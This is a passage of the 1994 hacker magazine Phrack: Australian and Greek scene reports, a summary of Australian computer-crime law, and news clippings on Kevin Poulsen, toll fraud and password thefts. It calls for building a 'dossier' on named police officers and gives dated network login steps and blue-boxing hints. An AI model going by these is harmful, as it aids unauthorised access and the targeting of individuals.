stupidity ( Hi Phoenix! ), being lagged in by some low life, or by trusting someone they should not of ( Hi Phoenix! ). LEGALITIES Both Hacking and Phreaking have been illegal in Australia for quite a few years I will not go into details here as hopefully there will be an article in this issue of Phrack covering the laws and possible penalties. Computer Crime in Australia is the responsibility of the Australian Federal Police Computer Crimes Unit. The people known to us in this unit are: Det. Sgt. Ken Day Det. Neil Campbell Det. Steve Visic ( Sorry guys if I spelled your names wrong - NOT! ;) ) If you are able to add any names to the list, please mail them to me and any other info you have on them. That way we can begin to build up a dossier on our enemies! PUBLIC There seems to be a growing awareness in the general populace of Australia. There has been quite a bit of media hype on hacking over the last year, and slowly the public seems to be getting a great fear of hackers. To me it seems ridiculous, as the only real hackers that the public should have feared lived in the early 80's. Today's generation of Australian hackers are pretty HOPELESS in my humble opinion. To give an example, when Electron, Nom, & Phoenix's court cases were getting media attention I was sitting in my parent's lounge room one night when the news was covering their sentencing. My father thought that these people were very dangerous and should have gotten a bigger sentence than they did. At this time he did not know about my bust. I have explained it to him now but he still doesn't seem to understand...oh well that life I guess. CONCLUSION This is how I see the Australian scene, If you disagree, want to comment, send me info for future articles, get on the hackfest mailing list, or just want to have a chat you can mail me at: dking@suburbia.apana.org.au If you require privacy you can send me stuff that is encoded via pgp, my pgp public key is as follows: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.0 mQCNAi0t3M4AAAEEAMPZMexyZ+Nxz8Ry1w9R7pTLFGM7xk0MwJ/izS687UIJLzc5 l38jFM0bEcuSukRrLkBYIDdiAgOdn50cJmKOPyvE4FvR2eh2dbdHyFKzaVWVe5zE HZhNx2o0kb6SRIQHu8Vh/pkl+S29RKzDbIgMLLjOCwN0V1/RUal4ROOqDaCbAAUT tCdEYXRhIEtpbmcgPGRraW5nQHN1YnVyYmlhLmFwYW5hLm9yZy5hdT4= =ttmq -----END PGP PUBLIC KEY BLOCK----- I can also usually be found on IRC a couple of hours a night in these channels under the nick of dking: #apana #hack #phreak #linux Thanks for assistance with this file go to: SPiN-DoC Olorin & Connie Lingus ( Motivational Support - ) Have phun, and remember: BE CAREFUL OUT THERE! ============================================================================== ()()()()()()()()()()()()()()()()()()()()()()()()() () () () "Australian Hacking Laws" () () () () 21/01/93 () () () () (c) Data King () () () ()()()()()()()()()()()()()()()()()()()()()()()()() Crimes Act 1914 (Commonwealth) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Part VIA - Offences Relating to Computers Section 19B (1) Order & Recognizance The Court can discharge you under this section, with a surety and/or recognizance given by you. If discharged under this section you may be put on a good behavior bond of up to but not exceeding 2 years. Other conditions may be placed on you by the court also, this conditions can be anything that the court considers appropriate. To have this section come into effect the following must apply: The Court is satisfied that the charge(s) are proved, but is of the opinion, having regard to: The Character, Antecedents, Age, Health, & Mental Condition that it is unexpedient to inflict any punishment or any punishment other than a nominal one on you. Basically what this means is that you can be found guilty and not have a conviction recorded against your name, but you must realign that the department of public prosecutions may object to this and then you will have to try and convince the Judge to ignore what the DPP says, (not easy). Also please realign that if you were to receive a section 19B and then were caught doing naughty things again and you are still under your good behavior bond, you will forfeit your bond and have to stand trial again for the original offence(s). Section 74A - Interpretation (1) In this part, unless the contrary intention appears: "carrier" means: (a) a general carrier within the meaning of the Telecommunications Act 1991; or (b) a mobile carrier within the meaning of that Act; or (c) a person who supplies eligible services within the meaning of that Act under a class licence issued under section 209 of that Act; "Commonwealth" includes a public authority under the Commonwealth; "Commonwealth computer" means a computer, a computer system or a part of a computer system owned, leased or operated by the Commonwealth; "Data" includes information, a computer program or part of a computer program. (2) In this Part; (a) a reference to data stored in a computer includes a reference to data entered or copied into the computer; and (b) a reference to data stored on behalf of the Commonwealth in a computer includes a reference to: (i) data stored in the computer at the direction or request of the Commonwealth; and (ii) data supplied by the Commonwealth that is stored in the computer under, or in the course of performing, a contract with the Commonwealth. Section 76B - Unlawful access to data in Commonwealth or other computers (1) A person who intentionally and without authority obtains access to: (a) data stored in a Commonwealth computer; or (b) data stored on behalf of the Commonwealth in a computer that is not a Commonwealth computer; IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 6 months (2) A person who (a) with intent to defraud any person and without authority obtains access to data stored in a Commonwealth computer, or to data stored on behalf of the Commonwealth in a computer that is not a Commonwealth computer; or (b) intentionally and without authority obtains access to data stored in a Commonwealth computer, or to data stored on behalf of the Commonwealth in a computer that is not a Commonwealth computer, being data that the person knows or ought reasonably to know relates to: (i) the security, defense or international relations of Australia; (ii) the existence or identity of a confidential source of information relating to the enforcement of a criminal law of the Commonwealth or of a State or Territory; (iii) the enforcement of a law of the Commonwealth or of a State or Territory; (iv) the protection of public safety; (v) the personal affairs of any person; (vi) trade secrets; (vii) records of a financial institution; or (viii) commercial information the disclosure of which could cause advantage or disadvantage to any person; IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 2 Years (3) A person who: (a) has intentionally and without authority obtained access to data stored in a Commonwealth computer, or to data stored on behalf of the Commonwealth in a computer that is not a Commonwealth computer; (b) after examining part of that data, knows or ought reasonably to know that the part of the data which the person examined relates wholly or partly to any of the matters referred to in paragraph (2)(b); and (c) continues to examine that data; IS GUILTY OF AN OFFENCE - PENALTY: for contravention of this subsection: Imprisonment for 2 years Section 76C - Damaging data in Commonwealth and other computers A person who intentionally and without authority or lawful excuse: (a) destroys, erases or alters data stored in, or inserts data into a Commonwealth computer; (b) interferes with, or interrupts or obstructs the lawful use of a Commonwealth computer; (c) destroys, erases, alters or adds to data stored on behalf of the Commonwealth in a computer that is not a Commonwealth computer; or (d) impedes or prevents access to, or impairs the usefulness or effectiveness of, data stored in a Commonwealth computer or data stored on behalf of the Commonwealth in a computer that is not a Commonwealth computer; IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 10 years Section 76D - Unlawful access to data in Commonwealth and other computers by means of certain facilities. (1) A person who, by means of a facility operated or provided by the Commonwealth or by a carrier, intentionally and without authority obtains access to data stored in a computer. IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 6 months (2) A person who: (a) by means of a facility operated or provided by the Commonwealth or by a carrier, with intent to defraud any person and without authority obtains access to data stored in a computer; or (b) by means of such a facility, intentionally and without authority obtains access to data stored in a computer, being data that the person knows or ought reasonably to know relates to: (i) the security, defense, or international relations of Australia (ii) the existence or identity of a confidential source of information relating to the enforcement of a criminal law of the Commonwealth or of a State or Territory; (iii) the enforcement of a law of the Commonwealth or of a State or Territory; (iv) the protection of public safety; (v) the personal affairs of any person; (vi) trade secrets; (vii) records of a financial institution; or (viii) commercial information the disclosure of which could cause advantage or disadvantage to any person; IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 2 Years (3) A person who: (a) by means of a facility operated or provided by the Commonwealth or by a carrier, has intentionally and without authority obtained access to data stored in a computer; (b) after examining part of that data, knows or ought reasonably to know that the part of the data which the person examined relates wholly or partly to any of the matters referred to in paragraph (2)(b); and (c) continues to examine that data; IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 2 Years. Section 76E - Damaging data in Commonwealth and other computers by means of certain facilities A person who, by means of a facility operated or provided by the Commonwealth, intentionally and without authority or lawful excuse: (a) destroys, erases or alters data stored in, or inserts data into a computer; (b) interferes with, or interrupts or obstructs the lawful use of, a computer; or (c) impedes or prevents access to, or impairs the usefulness or effectiveness of, data stored in a computer; IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 10 Years. Section 76F - Saving of State and Territory Laws Sections 76D and 76E are not intended to exclude or limit the concurrent operation of any law of a State or Territory. Conclusion: ~~~~~~~~~~~ You may have noticed that any hack of a Computer in Australia could result in you staying in a prison for quite a long time, as almost any hack would be and offence under just about all of the subsections listed above, combine this with a consecutive sentence and you *COULD* be in jail for over 25 years. "Be Careful Out There!!" ------------------------------------------------------------------------------ -- The HELLenic Digital Subculture Scene -- by Opticon the Disassembled - "EL33t3 Hackers": "TH3rE R N0 UNKraKKable ZyZTEMZ.EV3ry1 HAS[S] It's H0L3z." - I'm sure every "EL33t3#@$$^!!! HaKKER" has at least one hole by nature. "The Gods could have chosen any place but they chose Greece"...Yes, they did. By mistake probably. Agricultural country, light industry, member of the European Community, ten million residents, surrounded by sea (polluted in some areas) and forests (burned in some areas). Four thousand years old culture, beautiful language (due to it's ancientness) [...] Digital subculture scene? Quite a few articles appear on newspapers and magazines about CyberPunk. Quite a few people claim to be hackers (elite ones), crackers (elite ones), phreakers (elite ones) and coders (elite ones). University students get insane pleasure when talking about their last achievements, how they cracked all the accounts of a shadowed password file, and how they transferred 2000 true color, porno JPEG and phracking files. Public bulletin board systems distribute blue boxing related articles (Hail Mark Tabas!) and pirate boards distribute "oNE DaY WAREZ!@!#". "Phone freaks, crackers, hackers, virus makers." At the end, an interview with a young software cracker. He listens to TECHNO ("the only real music"), he would like to buy an Apple Powerbook and he needs only five minutes to "crack a disk". No busts have taken place AS FAR AS I KNOW. Only innocent pirates and couriers were prosecuted years ago, due to distribution of cracked programs for ZX Spectrum, Commodore and Amstrad ("peeks, pokes, hints & tips"). An article about "Legion Of Doom! - ComSec" appeared on November 1991: "X-Hackers offer their services to companies". Glamorous picture of the group, opinions, history, comments from a phracking illiterate journalist. An-archic 'zines (printed format) were publishing digital underground related news, since mid '80s. A family man in my city has been using a black box for 10 years. He accepts calls from relatives living in Italy. At the age of seventeen Nikos Nasoyfis wrote a book about 8088/8086 assembly programming and cracking of protection methods. He is considered to be a genius in those areas. Upon the request of a magazine he created "the first Hellenic virus". No Digital Underground / An-archy related systems exist, except DiES IRAE. But of course " If [When] you are good, nobody knows that you are there ". * Packet Switching Data Networks SERVICE: HELLASPAC DNIC: 2023 LOG-IN PROCEDURES 1. Dial access number: 1161 for both 300 and 1200 bps. Additionally, the following access numbers are available within Athens: 8848481, 8849021, and 3477699. 2. Upon connection, the user types three dots and Enter or Return: ... (CR) 3. The network will respond : HELLASPAC If no response, repeat step 2. 4. Upon receipt of the network prompt, the user types (in capital letters): NXXXX - 0 WWWW (CR) where XXXX is the user's NUI and WWWW is the NUA. 5. HELLASPAC will answer : COM 6. To log off, type (CTRL)PCLR(CR) The network will respond CLR CONF Until the end of the year a free experimental 2400bps ( 1200 baud + MNP 5 ) dial up public service will be operating at 0961-11111 (if you call this a 2400 baud NUI, shame on you! You know who you are :-) ). 0961-22222 will lead to HellasTel ( Video Text ). Can't tell if foreigners can call these numbers. SERVICE: ARIADNET Ariadnet is a Hellenic research/academic network sponsored by the European Community. There are two main hosts: LEON and ISOSUN. The first one serves the public; dial-ups, low cost (10.000 drg for three months), yet low disk quota (starts from 1 MB) due to "the workstation's incapability to carry a lot of hard disks". The second one serves users who call from other sources (i.e. PSDNs). Thanks to Ariadnet most universities provide free internet access (usually they reach 1 KiloByte per second) in conjunction to restricted HellasPac access (a.k.a. high expenses). The following captures will talk by themselves. ** ISOSUN @ ARIADNE hellenic research/academic network login: help Last login: Wed Mar 18 19:37:13 from 38212026 SunOS Release 4.0.3_EXPORT (ARIADNE.FEB2) #1: Thu Feb 13 13:04:45 EET 1992 Please, do not leave your mail in mailing queue for a long time. Clean them up often. Otherwise your mail may be lost.... thanks postmaster A R I A D N E T - X.121 server Demokritos isosun SUN:INTERNET,X400-R&D-MHS 10100101, leon 10100102 PRIME 9950 primos: EARN-BITNET 10100100, gatos 10100104 mVAX DECNET-CERN (cluster) 10100103, KE-lab 10100108 EIE mVAx 101002005 EKT Data Bases PERKIN-ELMER 10100200 Kapodistriako Pan.CYBER-NOS 10100401, mVAX 10100402 Aristotelion Pan. mVAX 13100104, unix 386 13100108, Metsovion Polytechnion vms-mvax 1010030107, sun 1010030106 High Energy Lab 10100351 Gen.Secr. Research UNIX V 1010050008, sequent 1010050007 ITY Pan. Patra, CTI unix server 16100101 ATE Pan. Crete , FORTH 18100100 ASSOE(Athens U. of Economics) VAX/VMS 10100600 NATIONAL OBSERVATORY VAX/VMS 10100700 Rethimno Pan Kritis/Economics-Philosophy 38312025 Chania Poly. Kritis 38212026 ZENON,INTRAKOM,ATKO, HITEC, PLANET via X25 and TCPIP/X25 ATDP6519905 ATDP6533172 V21/V22 MODEM hayes, no parity, 1 stop bit, 8 data connect to ARIADNET pad service @ Demokritos HELLASPAC Gateway, IXI Gateway, X400 Gateway, Internet Gateway INFORMATION: +301 6513392 FAX: 6532175 TEAM: Y.Corovesis,A.Drigas,T.Telonis (+4 students) ADMINISTRATION: A.Arvilias tel:+301 6515224 NEXT: TEI-Pirea, EMY, NTUA-physicslab, Thessaloniki VAX9000 ** * Phone Network The last four years or so, the old analog switching centers (HDW, Rotary, Crossbar) are being replaced with digital ones (Ericsson-Intracom AXE-10 and Siemens EWSD). Theoretically that should be completed by the end of 1994 (according to the Christian way of chronometry). These provide the following for the masses: PAGING (was operating anyway) HOT LINE "WAKE-UP" SERVICE ABBREVIATED DIALLING THREE PARTY SERVICE CALL WAITING "DOT NOT DISTURB" SERVICE OUTGOING CALL BARRING MALICIOUS CALL IDENTIFICATION ABSENT SUBSCRIBER SERVICE LINE HUNTING TOLL TICKETING (sure they do!) ...and of course better control OF the masses FOR the state. I got very interesting results exploring those new centers. If I ever finish the project it will appear in Phrack or UPi (hopefully). Damn...Better to think over that twice. Abusing raises eyebrows. The country direct numbers use the 00-800-country code-11 format. Believe it or not; I had to social engineer the directory assistance operator to start moving. Not to mention the time and examples he needed to understand what I was talking about. Bad luck? FINLAND 00-800-358-11 CYPRUS 00-800-357-11 ICELAND 00-800-353-11 BRITAIN/NORTH IRELAND 00-800-44-11 SWEDEN 00-800-46-11 HOLLAND 00-800-31-11 NORWAY 00-800-47-11 DENMARK 00-800-45-11 FRANCE 00-800-33-11 GERMANY 00-800-49-11 M.C.I. 00-800-122155 00-800-1211 SPRINT 00-800-1411 AT&T 00-800-1311 As of now only U.S.A. direct numbers can be used for blue boxing. It was possible to do so and it should be possible nowadays, although I cannot confirm that. The last months I have spent A LOT of time scanning numbers and frequencies but I didn't come to an end. To be continued... * Cellular Phone Networks The pen-European digital (shit!) mobile telephony system G.S.M. is being implemented. Nothing is solid yet and of course no one claims (trumpet fanfare added here) that phreaks out through that. In the first state PANAFON will cover Athens and Argosaronic and afterwards all the big cities: Thessaloniki (it should be functioning by now), Patra, Heraklio et cetera. They are planning to cover more than 90% of the country's residents and 75% of the geographical region. Problems appear thanks to the strange terrain. I don't know what is going on with TELESTET. The total registered subscribers are considered to be about ten thousand. * Miscellaneous An Integrated Service Digital Network is being established and local universities are installing [optical] Fiber Distributed Data Interfaces. PBXs are now becoming popular. Most operators know little or nothing on computer security or managing in general. That's why some of them accept offered help and provide afterwards (non-privileged) accounts and old, yet valuable, duplicate manuals. If some anti-hacking measurements are taken, that is thanks to the company employers who maintain and prepare the systems. Do not hang on this, but I think that there are no laws concerning H/P in particular. Needless to say that no conferences take place. Of course QSD & IRC...ohhh fuck it. ==Phrack Magazine== Volume Five, Issue Forty-Five, File 28 of 28 PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN PWN PWN PWN Phrack World News PWN PWN PWN PWN Compiled by Datastream Cowboy PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN Paramount's Hack Attack March 3, 1994 ~~~~~~~~~~~~~~~~~~~~~~~ Reuter News Wire Though the minds of Paramount execs have surely been n potential whackings, computer hacking was the chief focus of execs Bob Jaffe and John Goldwyn last week. The execs got Par to pay a low six-figure fee against mid-six figures to Johnathan Littman for the rights to make a movie from his Sept. 12 LA Times Magazine article "The Last Hacker," and major names are lining up to be involved. It's the story of Kevin Lee Poulsen, a skilled computer hacker who was so inventive he once disabled the phone system of KIIS_FM so he could be the 102nd caller and win the $50,000 Porsche giveaway. Poulsen was caught and has been in jail for the last three years, facing more than 100 years in prison. It was a vicious tug of war between Touchstone, which was trying to purchase it for "City Slickers" director Ron Underwood. Littman, meanwhile, has remained tight with the underground community of hackers as he researches his book. That takes its tool. Among other things, the mischief meisters have already changed his voice mail greeting to render an obscene proposal. ------------------------------------------------------------------------------ Hacker Attempts To Chase Cupid Away February 10, 1994 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ UPI News Sources Two bachelors who rented a billboard to find the perfect mate said Thursday they had fallen victim to a computer hacker who sabotaged their voice mail message and made it X-rated. Steeg Anderson said the original recording that informed callers how they may get hold of the men was changed to a "perverted" sexually suggestive message. "We are getting calls from all over the country," he said. "So we were shocked when we heard the message. We don't want people to get the wrong idea." "It's rare, but we've seen this kind of thing before," said Sandy Hale, a Pac Bell spokeswoman. "There is a security procedure that can prevent this from happening, but many people simply don't use it." ------------------------------------------------------------------------------ Wire Pirates March 1994 ~~~~~~~~~~~~ by Paul Wallich (Scientific American) (Page 90) Consumers and entrepreneurs crowd onto the information highway, where electronic bandits and other hazards await them. [Scientific American's latest articles about the perils of Cyberspace. Sound bytes galore from Dorothy Denning, Peter Neumann, Donn Parker, Mark Abene, Gene Spafford and others. Much better than their last attempt to cover such a thing back in 1991.] ------------------------------------------------------------------------------ AT&T Warns Businesses December 8, 1993 ~~~~~~~~~~~~~~~~~~~~~ Business Wire Sources AT&T urges businesses to guard against increased risk of toll-fraud attempts by hackers, or toll-call thieves, during the upcoming holiday season. Last year nationwide toll-fraud attempts increased by about 50 percent during the Christmas week. Hackers "break into" PBXs or voice-mail systems, obtain passwords or access to outside lines, and then sell or use the information to make illegal international phone calls. Toll fraud cost American businesses more than $2 billion in 1993. "Hackers count on being able to steal calls undetected while businesses are closed during a long holiday weekend," says Larry Watt, director of AT&T's Toll Fraud Prevention Center. "Tis the season to be wary." AT&T is the industry leader in helping companies to prevent toll fraud. Businesses that want more information on preventative measures can request AT&T's free booklet, "Tips on Safeguarding Your Company's Telecom Network," by calling 1-800-NET-SAFE. ------------------------------------------------------------------------------ Sadomasochists Meet Cyberpunks At An L.A. Party June 14, 1993 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Jessica Seigel (Chicago Tribune) Sadomasochists meet the cyberpunks. Leather meet hypernormalcy. Body piercing meet network surfing (communicating by computer). It was a night for mingling among the subcultures to share their different approaches to messing with mind and body. The recent party at the S&M club "Club Fuck" was organized by "Boing Boing," a zine that focuses on the kinetic, futuristic world of the new frontier known as cyberspace. This place doesn't exist in a physical location, but anyone can visit from their home computer by hooking into vast electronic networks. A blindfolded man dressed in a jock strap and high heeled boots stood on stage while helpers pinned flashing Christmas lights to his flesh with thin needles. Then a man with deer antlers tied to his forehead whipped him. The crowd of mostly twentysomethings who came to the club because of the cyber theme observed with stony expressions. Chris Gardner, 24, an architecture student who studied virtual reality in school, covered his eyes with his hand. No one, really was "fitting in." The sadomasochists looked curiously at the very-average-looking cyber fans, who openly gawked back at the black leather, nudity and body piercing. Sharing subcultures can be so much fun. ------------------------------------------------------------------------------ Intruder Alert On Internet February 4, 1994 ~~~~~~~~~~~~~~~~~~~~~~~~~~ AP News Sources Intruders have broken into the giant Internet computer network and users are being advised to protect themselves by changing their passwords. The breaks-ins may jeopardize the work of tens of thousands of computer users, warned the Computer Emergency Response Team, based at Carnegie Mellon University in Pittsburgh. "Intruders have already captured access information for tens of thousands of systems across the Internet," said an emergency response team sent out on the network late Thursday. Passwords were obtained by the intruders using a "Trojan horse program," so called because it can enter the main computer for some legitimate purpose, but with coding that lets it remain after that purpose is accomplished. The program then records the first 128 keystrokes when someone else connects to the Internet, and the illegal user later dials in and receives that information. The first keystrokes of a user generally contain such information as name and password of the user. Once they know that the intruders can then sign on as the person whose password they have stolen, read that person's files and change them if they wish. ------------------------------------------------------------------------------ Harding Email Compromised by Journalists February 27, 1994 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by C.W. Nevius (SF Chronicle) In another example of the media circus that has dogged Tonya Harding, a number of American journalists have apparently obtained the secret computer code numbers that would allow them to read Harding's personal electronic mail at the Winter Olympics. No reporters have admitted reading Harding's electronic mail, but the apparent access to private communications has caused concern among those covering the Games. The Olympic computer system is one of the most popular communications devices at the Games. Any member of the Olympic family -- media, athlete or Olympic official -- can message anyone else from any of several hundred computer terminals all over the Olympic venues. The flaw in the system is that it is not especially difficult to break the personal code. Every accredited member of the Olympic family is given an identification number. It is written on both the front and back of the credential everyone wears at the Games. Anyone who has a face-to-face meeting with an athlete would be able to pick up the accreditation number, if the person knew where to look. Each person is also given a "Secret" password to access the communication system. At the outset, the password was comprised of the digits corresponding to that person's birth date. Although Olympic officials advised everyone to choose their own password, Harding apparently never got around to doing so. Harding's initial password would have been 1112, because her birthday is the 11th of December. Although none of the writers at the Olympics has admitted reading Harding's personal electronic mail, it would be difficult, if not impossible, to determine if anyone did any actual snooping. There are no records kept of who signs on to the computer from any particular terminal. ------------------------------------------------------------------------------ Reality Check January 1994 ~~~~~~~~~~~~~ by Doug Fine (Spin) (Page 62) I ask accused hacker Kevin Lee Poulsen if, as he approaches three years in jail without trial, he has any regrets about his computer-related activities. Without missing a beat, and breaking a media silence that began with his first arrest in 1988, he answers: "I regret shopping at Hughes Supermarket. I'm thinking of organizing a high-tech boycott." Poulsen is referring to the site of his 1991 bust in Van Nuys, California. There, between the aisles of foodstuffs, two zealous bag-boys -- their resolve boosted by a recent episode of Unsolved Mysteries that featured the alleged criminal -- jumped the 25-year-old, wrestled him to the ground, and handed the suspect over to the security agents waiting outside. Poulsen still kicks himself for returning to Hughes a second time that spring evening. According to court documents, a former hacker crony of Poulsen's, threatened with his own prison sentence, had tipped off the FBI that Poulsen might be stopping by. What, I ask him, had he needed so badly that he felt compelled to return to a supermarket at midnight? "Do you even have to ask?" he says. "Condoms, of course." [A very different Kevin Poulsen story. Get it and read it.] ------------------------------------------------------------------------------ Key Evidence in Computer Case Disallowed January 4, 1994 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Los Angeles Staff Writers (Los Angeles Times) (Page B3) U.S. District Judge Ronald Whyte in San Jose said computer tapes found in a storage locker rented by Kevin Lee Poulsen should not have been examined by prosecutors without a search warrant and cannot be used as evidence. Whyte had ruled the tapes admissible last month but changed his mind, saying he had overlooked evidence that should have put a police officer on notice of Poulsen's privacy rights. In addition to illegal possession of classified government secrets, Poulsen faces 13 other charges, including eavesdroping on telephone conversations, and tapping into Pacific Bell's computer and an unclassified military computer network. He could be sentenced to 85 years in prison if convicted of all charges. His lawyer, Paul Meltzer of Santa Cruz, said the sole evidence of the espionage charge is contained on one of the storage locker tapes. Meltzer said a government analyst found that the tape contained a 1987 order, classified secret, concerning a military exercise. Poulsen, who lived in Menlo Park at the time of his arrest in the San Jose case, worked in the mid-1980s as a consultant testing Pentagon computer security. He was arrested in 1988 on some of the hacking charges, disappeared and was picked up in April, 1991, after a tip prompted by a television show. ------------------------------------------------------------------------------ Hacker to ask charges be dropped January 4, 1994 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ UPI News Sources An attorney for a former Silicon Valley computer expert accused of raiding confidential electronic government files said Tuesday he will ask to have charges dismissed now that a federal judge has thrown out the government's chief evidence. Attorney Peter Leeming said the government's case against Kevin L. Poulsen is in disarray following a ruling suppressing computer tapes and other evidence seized from a rented storage locker in 1988. ''We're ready to go to trial in the case, and actually we're looking forward to it,'' Leeming said. Poulsen is charged with espionage and other offenses stemming from his hacking into military and Pacific Bell telephone computers. The government alleges that Poulsen illegally obtained confidential military computer codes and confidential information on court-ordered wiretaps. ------------------------------------------------------------------------------ The Password is Loopholes March 1, 1994 ~~~~~~~~~~~~~~~~~~~~~~~~~ by Joshua Quittner (Newsday) (Page 61) You'd think that Polytechnic University, in Brooklyn, one of the finer technical schools in the country, would know how to safeguard its computer system against hacker intrusions. And you'd think the same of New York University's Courant Institute, which hosts the mathematical and computer science departments. But a teenage Brooklyn hacker, who calls himself Iceman, and some of his friends say they invaded the schools Internet-connected computers and snatched the passwords of 103 students. Internet break-ins have been a national news story lately, with reports that unknown intruders have purloined more than 10,000 passwords in a burst of activity during recent months. The Federal Bureau of Investigation is investigating, since so many "federal-interest computers" are attached to the wide-open Internet and since it is a crime to possess and use other peoples' passwords. Experts now believe that a group of young hackers who call themselves The Posse are responsible for the break-ins, though who they are and what they're after is unclear. Some people believe the crew is merely collecting passwords for bragging rights, while others suspect more insidious motives. Their approach is more sophisticated, from a technical standpoint, than Iceman's. But the result is the same. Now Iceman, who's 18, has nothing to do with The Posse, never heard of it, in fact. He hangs with a group of budding New York City hackers who call themselves MPI. Iceman told me it was simple to steal 103 passwords on the universities systems since each password was a common word or name. What did Iceman and company do with the passwords? He said mostly, they enjoy reading other people's files and e-mail. "Every once in a while," he said, "you get something interesting." ------------------------------------------------------------------------------ A Rape In Cyberspace December 21, 1993 ~~~~~~~~~~~~~~~~~~~~ by Julian Dibbell (Village Voice) (Page 36) [ Some guy made my MUD character do bad things in a public area. And all the other MUDders could do was sit and watch! WAHHHHH. Get a fucking life, people. Wait, let me restate that; Get a FUCKING REAL LIFE!] ------------------------------------------------------------------------------ Hacking Goes Legit February 7, 1993 ~~~~~~~~~~~~~~~~~~ by Ann Steffora and Martin Cheek (Industry Week) (Page 43) Corporations ARE using "tiger teams" and less glamorous methods to check computer security. [Uh, yeah. Sure they are. Hey, is that an accountant in your dumpster? Better tuck in that tie dude. Don't forget your clipboard! I will put a computer security audit by me, or by anyone from the hacker community, against a computer security audit done by ANY of the following: Coopers & Lybrand, Deloitte & Touche, Arthur Andersen or Price Waterhouse. It's no contest. These people are NOT computer people. Period. Get the hell out of the computer business and go do my fucking taxes.] ------------------------------------------------------------------------------